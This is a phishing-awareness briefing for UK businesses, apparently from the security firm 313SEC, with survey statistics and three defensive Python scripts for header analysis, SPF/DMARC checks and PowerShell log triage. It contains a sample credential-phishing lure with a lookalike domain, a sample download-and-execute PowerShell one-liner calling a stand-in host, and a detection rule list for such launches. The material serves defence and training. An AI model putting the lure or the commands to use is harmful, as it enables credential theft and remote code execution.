The government's own data is clear: 88% of breached businesses traced their incident back to a phishing email. That is not a technology problem. It is a people problem, a process problem, and a board-level responsibility. This briefing breaks down what the attacks look like, how they work, and what you can do about them this quarter.
The Cyber Security Breaches Survey 2025/2026, published by the Department for Science, Innovation and Technology, surveyed 2,112 businesses. These are the findings that should be keeping business owners up at night.
That is approximately 612,000 businesses reporting at least one cyber breach or attack in the last twelve months. The number has held flat since last year, which means the problem is not getting better. It is becoming background noise.
Among those who were breached, phishing was the attack method in 88% of cases. 51% experienced phishing and nothing else. This is not one of many threats. It is functionally the only threat most businesses will ever face.
For those who suffered a serious breach, the outcomes are worse than last year. Revenue loss jumped, reputational damage tripled from 1% to 3%, and the share of micro-businesses recovering within a day fell from 92% to 86%. The long tail of serious incidents is getting uglier.
Only 25% of businesses have a formal incident response plan. Only 34% patch critical vulnerabilities within 14 days. Only 47% have two-factor authentication. The basics are not in place for the majority.
[Stat tiles: businesses hit in 12 months; total cyber crimes against businesses; have 2FA deployed; hold Cyber Essentials]
Modern phishing campaigns are not random spam blasts. They are structured operations with defined stages, each exploiting a different weakness. Each stage is also a point where the right control can stop them dead.
Attackers invest real effort into crafting emails that look legitimate. Knowing the indicators, both visible and hidden in email headers, is the first line of human-layer defence.
Dear Account Holder,
We have detected unusual sign-in activity from an unrecognised device in Eastern Europe. To protect your account, verify your credentials within 24 hours or your account will be permanently suspended.
https://m1crosoft-verify.com/secure-login?token=8kx29Jqp
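The lure above can be checked mechanically once it has landed in a mailbox, because the receiving server stamps the headers the sender cannot control. The script below is an added example, not part of the original briefing and not 313SEC code: it parses a constructed message (body taken from the lure above, headers invented for illustration) and reports the visible and hidden indicators it finds. The brand allowlist, the urgency phrase list and the homoglyph table are assumptions for the example.

```python
"""Header and body indicator check for a suspected phishing email (added example)."""
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed raw message, as it would sit in a mailbox after delivery.
RAW_MESSAGE = """\
Return-Path: <bounce@mail-relay-7721.example>
Authentication-Results: mx.example.co.uk; spf=fail smtp.mailfrom=mail-relay-7721.example; dkim=none; dmarc=fail header.from=m1crosoft-verify.com
From: "Microsoft Account Security" <no-reply@m1crosoft-verify.com>
Reply-To: <recovery@m1crosoft-verify.com>
To: <accounts@example.co.uk>
Subject: Unusual sign-in activity detected
Content-Type: text/plain; charset="utf-8"

Dear Account Holder,

We have detected unusual sign-in activity from an unrecognised device in Eastern Europe. To protect your account, verify your credentials within 24 hours or your account will be permanently suspended.

https://m1crosoft-verify.com/secure-login?token=8kx29Jqp
"""

# Constructed benign message for contrast: internal sender, every check passes.
LEGIT_MESSAGE = """\
Authentication-Results: mx.example.co.uk; spf=pass smtp.mailfrom=example.co.uk; dkim=pass header.d=example.co.uk; dmarc=pass header.from=example.co.uk
From: "Example Ltd Accounts" <accounts@example.co.uk>
To: <jane@example.co.uk>
Content-Type: text/plain; charset="utf-8"

Hi Jane, the March invoices have gone out. Summary is on the shared drive.
"""

# Brands commonly impersonated and the domains they legitimately send from (assumed allowlist).
BRAND_DOMAINS = {"microsoft": {"microsoft.com", "microsoftonline.com"}}
URGENCY_PHRASES = ("within 24 hours", "permanently suspended", "verify your credentials")
# Digit-for-letter substitutions used in lookalike domains ("m1crosoft" -> "microsoft").
HOMOGLYPHS = str.maketrans({"1": "i", "0": "o", "3": "e", "5": "s", "7": "t"})

def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""

def _impersonated_brand(text: str):
    """Brand whose name appears in text once homoglyph digits are normalised, else None."""
    normalised = text.lower().translate(HOMOGLYPHS)
    return next((b for b in BRAND_DOMAINS if b in normalised), None)

def _host_belongs_to(brand: str, host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS[brand])

def analyse(raw: str) -> list[str]:
    """Return 'tag: detail' findings; an empty list means no indicator fired."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    display_name, from_addr = parseaddr(str(msg["From"] or ""))
    from_domain = _domain(from_addr)
    _, return_path = parseaddr(str(msg["Return-Path"] or ""))
    _, reply_to = parseaddr(str(msg["Reply-To"] or ""))
    auth = str(msg["Authentication-Results"] or "").lower()
    body = msg.get_body(preferencelist=("plain",)).get_content()

    # 1. Display name or sender domain claims a brand that the domain does not belong to.
    brand = _impersonated_brand(display_name) or _impersonated_brand(from_domain)
    if brand and not _host_belongs_to(brand, from_domain):
        findings.append(f"brand-domain-mismatch: '{display_name}' sent from {from_domain}, not a {brand} domain")
    # 2. Envelope sender and visible From disagree (bulk senders do this too, so a weak signal alone).
    if return_path and _domain(return_path) != from_domain:
        findings.append(f"return-path-mismatch: envelope sender {_domain(return_path)} vs From {from_domain}")
    # 3. Replies are steered to a different address than the one shown as sender.
    if reply_to and reply_to.lower() != from_addr.lower():
        findings.append(f"reply-to-mismatch: replies go to {reply_to}")
    # 4. The receiving server's own SPF/DKIM/DMARC verdicts, hidden from the reader in the headers.
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        if m and m.group(1) != "pass":
            findings.append(f"auth-{mech}: {mech}={m.group(1)}")
    # 5. Pressure language in the body.
    hits = [p for p in URGENCY_PHRASES if p in body.lower()]
    if hits:
        findings.append("urgency-language: " + ", ".join(hits))
    # 6. Links whose host does not belong to the brand the message claims to come from.
    for url in re.findall(r"https?://[^\s<>\"']+", body):
        host = (urlparse(url).hostname or "").lower()
        if brand and not _host_belongs_to(brand, host):
            findings.append(f"link-host-mismatch: {host} is not a {brand} domain")
    return findings

if __name__ == "__main__":
    for line in analyse(RAW_MESSAGE):
        print(line)
```

Run on the constructed lure it reports eight findings, three of them from the Authentication-Results header alone; on the benign message it reports none. The point for staff training is that the sender's domain, the Reply-To and the link host are visible to anyone who looks, while the authentication verdicts are there for the mail system to act on before a person ever sees the message.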
This is the single most dangerous sentence in business cybersecurity. It is not just wrong. It is precisely what attackers are counting on you to believe. Here is why.
Attackers do not browse a directory and hand-pick targets. Modern phishing campaigns are automated, industrialised operations. They scrape thousands of email addresses from public sources, breached databases, and Companies House filings, then blast lures at scale. Your business does not need to be interesting. It just needs to exist and have an email address.
That is not a rounding error. Nearly half of the smallest businesses in the country experienced some form of breach or attack. The survey explicitly notes that this is likely an undercount, because many attacks go undetected entirely.
Every business holds data that has direct monetary value on criminal marketplaces. Customer email addresses, payment card details, staff national insurance numbers, supplier banking information, login credentials. Even a small customer database of 200 records has resale value. An email account with access to invoice workflows is worth more than a stolen credit card, because it enables business email compromise fraud worth thousands per transaction.
Small businesses are routinely used as staging grounds for attacks against larger targets. If your business has a single email integration, shared drive, or VPN connection with a larger client, you are a door into their network. Only 15% of businesses review the cyber risk posed by their immediate suppliers. Only 6% look at the wider supply chain. Attackers know this and exploit the weakest link.
Beyond supply chain attacks, compromised small business infrastructure gets conscripted into botnets. Your office router, NAS drive, or unpatched server becomes a zombie device, used to relay spam, launch denial-of-service attacks, or host phishing pages that target other victims. You may never know it happened, and your IP address ends up on blocklists, damaging your email deliverability and business reputation.
Credential breaches are cumulative. When a major platform gets compromised, millions of email and password combinations end up in publicly traded databases. If any of your staff reuse passwords (and statistically, most do), those credentials are already circulating. Attackers run credential stuffing attacks against business email portals, accounting software, and cloud platforms using these leaked pairs. You do not need to be directly attacked. You are caught in the splash damage of someone else's breach.
The survey found that 19% of businesses were victims of at least one cyber crime, and the mean number of cyber crimes per victim was 19. That is not a one-and-done event. It is sustained, repeated targeting.
No single control stops phishing. Effective protection requires defence in depth, layering technical controls, process, and people-led awareness into a coherent, measurable programme.
SPF, DKIM and DMARC, the three DNS-based email authentication protocols, are the foundation of email authentication. Without them, anyone can send email that appears to come from your domain. DMARC at a reject policy stops the vast majority of spoofed email from reaching your staff.
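Most domains that "have SPF and DMARC" are in fact sitting at a monitoring-only policy that blocks nothing. The checker below is an added example, not part of the original briefing and not 313SEC tooling: it evaluates the SPF and DMARC TXT records a domain publishes and flags the settings that leave spoofing possible. The four records are constructed to show a typical weak pair beside the hardened target state; in practice the inputs come from `dig TXT example.co.uk` and `dig TXT _dmarc.example.co.uk`.

```python
"""Assess SPF and DMARC TXT records for weak settings (added example)."""
import re

# Constructed records: the weak pair is what a long-neglected domain often looks like,
# the hardened pair is the target state.
WEAK_SPF = "v=spf1 a mx include:_spf.mailer.example ?all"
HARDENED_SPF = "v=spf1 include:_spf.mailer.example -all"
WEAK_DMARC = "v=DMARC1; p=none; pct=50"
HARDENED_DMARC = "v=DMARC1; p=reject; sp=reject; pct=100; adkim=s; aspf=s; rua=mailto:dmarc-reports@example.co.uk"

# Terms that each consume one of the ten DNS lookups SPF permits (RFC 7208 section 4.6.4).
LOOKUP_TERM = re.compile(r"^[+\-~?]?(include:|a(:|/|$)|mx(:|/|$)|ptr|exists:|redirect=)", re.I)

def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict keyed by lower-case tag."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags

def assess_dmarc(record: str) -> list[str]:
    """Return the weaknesses in a DMARC record; an empty list means it is at full strength."""
    tags = parse_dmarc(record)
    if tags.get("v") != "DMARC1":
        return ["not a DMARC record: missing v=DMARC1"]
    issues = []
    p = tags.get("p", "").lower()
    if p == "none":
        issues.append("p=none: monitoring only, spoofed mail is still delivered")
    elif p == "quarantine":
        issues.append("p=quarantine: spoofed mail lands in junk instead of being rejected")
    elif p != "reject":
        issues.append(f"p={p or '<missing>'}: no valid policy tag")
    pct = int(tags.get("pct", "100"))
    if pct < 100:
        issues.append(f"pct={pct}: only {pct}% of failing mail is subject to the policy")
    # Subdomain policy defaults to p; an explicit weaker sp is a gap attackers use.
    if p == "reject" and tags.get("sp", p).lower() != "reject":
        issues.append(f"sp={tags['sp']}: subdomains are held to a weaker policy than the apex")
    if "rua" not in tags:
        issues.append("no rua: aggregate reports are not collected, so you cannot see who is spoofing you")
    return issues

def assess_spf(record: str) -> list[str]:
    """Return the weaknesses in an SPF record; an empty list means it is at full strength."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["not an SPF record: must start with v=spf1"]
    issues = []
    all_term = next((t for t in terms[1:] if t.lower().lstrip("+-~?") == "all"), None)
    if all_term is None:
        issues.append("no 'all' mechanism: result is neutral for any sender not listed")
    elif all_term.lower() in ("all", "+all"):
        issues.append("+all: every host on the internet passes SPF for this domain")
    elif all_term == "?all":
        issues.append("?all: neutral result, receivers treat it as no policy")
    elif all_term == "~all":
        issues.append("~all: softfail only; acceptable only once DMARC is at p=reject")
    lookups = sum(1 for t in terms[1:] if LOOKUP_TERM.match(t))
    if lookups > 10:
        issues.append(f"{lookups} lookup terms in this record alone: over the 10-lookup limit, receivers return permerror")
    return issues

if __name__ == "__main__":
    for label, rec, fn in (("SPF", WEAK_SPF, assess_spf), ("DMARC", WEAK_DMARC, assess_dmarc)):
        print(label, rec, "->", fn(rec) or "ok")
```

The lookup count here only covers terms in the record itself; each `include:` pulls in another record whose own lookups also count towards the limit of ten, so a real audit resolves the chain before declaring a record healthy. Move from `p=none` to `p=quarantine` to `p=reject` only after the aggregate reports show every legitimate sender (invoicing platform, CRM, newsletter tool) passing.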
The government survey shows only 47% of businesses have two-factor authentication and only 5% hold Cyber Essentials certification. Email authentication deployment is even lower across the broader business population.
The most effective way to reduce human-layer risk is to put your staff through realistic, controlled phishing simulations before real attackers do. Frameworks like Gophish allow security teams to craft and deploy campaigns that mirror real-world tactics, track click rates, and trigger immediate contextual training for those who fall victim.
The government data shows only 19% of businesses ran any kind of staff training or awareness activity. Click-through rates above 10% indicate a high-risk workforce. Businesses running quarterly simulations typically see a 60-70% reduction in click rates within 12 months.
Generative AI has fundamentally changed the threat landscape. Attackers now produce flawless, personalised phishing emails at scale, sourced from a target's public LinkedIn profile, company website, and social media. Rule-based filters that relied on spelling mistakes and generic templates are becoming obsolete.
Modern defensive models analyse message semantics, sender reputation, URL characteristics, and behavioural signals simultaneously, flagging suspicious emails before they reach an inbox. Credential phishing now accounts for 94% of all payload-based email attacks globally.
The government survey found 31% of businesses are using or considering AI, but only 24% of those have any cyber processes for managing AI risk. Adoption is outrunning governance.
ML classifiers trained on threat intelligence datasets achieve 94%+ accuracy on known phishing patterns. 313SEC integrates reputation feeds and real-time URL analysis into managed detection workflows.
When a user clicks, endpoint controls are your final barrier. Attack Surface Reduction rules, PowerShell logging, and network protection policies stop payloads from executing even after a successful phishing click.
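PowerShell script block logging only helps if someone is reading the resulting events. The triage script below is an added example, not part of the original briefing and not 313SEC tooling: it scores Event ID 4104 script block entries against a small rule list of the launch flags and download behaviour that a payload run after a phishing click tends to exhibit, so that an analyst sees the handful that matter rather than every line of routine administration. The events, rule weights and alert threshold are constructed assumptions for the example.

```python
"""Score PowerShell script block log events (Event ID 4104) for post-click activity (added example)."""
import re

# Constructed events in the shape a SIEM would export them: (event id, host, script text).
EVENTS = [
    (4104, "ws-finance-03", "Get-ChildItem C:\\Users\\jane\\Documents -Filter *.xlsx"),
    (4104, "ws-finance-03", "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand <base64 omitted>"),
    (4104, "ws-sales-11", "IEX (New-Object Net.WebClient).DownloadString('http://invoice-update.invalid/u.ps1')"),
    (4103, "ws-sales-11", "Module logging event, not a script block"),
]

# Each rule: (name, weight, pattern). Weights are an assumption; tune them against your own baseline.
RULES = [
    ("encoded-command", 3, re.compile(r"-(e|ec|enc|encodedcommand)\s", re.I)),
    ("hidden-window", 2, re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("policy-bypass", 2, re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I)),
    ("no-profile", 1, re.compile(r"-no(p|profile)\b", re.I)),
    ("download", 4, re.compile(r"(downloadstring|downloadfile|invoke-webrequest|iwr|invoke-restmethod|irm)\b", re.I)),
    ("in-memory-exec", 3, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
]
THRESHOLD = 4  # assumption: raise an alert at or above this combined score

def score_block(text: str) -> tuple[int, list[str]]:
    """Return (total score, names of the rules that matched) for one script block."""
    hits = [name for name, _, rx in RULES if rx.search(text)]
    total = sum(weight for name, weight, _ in RULES if name in hits)
    return total, hits

def triage(events) -> list[dict]:
    """Return alert records for the 4104 events whose score reaches the threshold."""
    alerts = []
    for event_id, host, text in events:
        if event_id != 4104:  # only script block events carry the script text
            continue
        total, hits = score_block(text)
        if total >= THRESHOLD:
            alerts.append({"host": host, "score": total, "indicators": hits, "script": text[:120]})
    return alerts

if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert["host"], alert["score"], alert["indicators"])
```

On the constructed events the routine file listing scores zero, while the hidden encoded launch and the download-and-execute one-liner both clear the threshold. Script block logging is enabled under the PowerShell administrative template policy (Turn on PowerShell Script Block Logging), and the same host-level context is where Attack Surface Reduction block events should be correlated, since a blocked payload and a logged launch attempt on the same workstation within minutes of a phishing click is the clearest signal an incident responder can ask for.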
Response speed is the single greatest determinant of breach cost. Under UK GDPR, personal data breaches must be reported to the ICO within 72 hours. The decisions made in that window define the outcome.
Based on the government survey data and our own assessment work, these are the control areas with the highest risk scores and the greatest opportunity for rapid improvement.
313SEC delivers phishing simulation programmes, email authentication configuration, and ongoing managed detection built specifically for businesses who need enterprise-grade protection without enterprise overhead.
If anything in this briefing made you tilt your head, drop your details below. No sales script, no auto-sequence. Just a real reply from a real person within a working day or two.
You'll get a real reply, from a real person, within a couple of working days. Cheers for reading.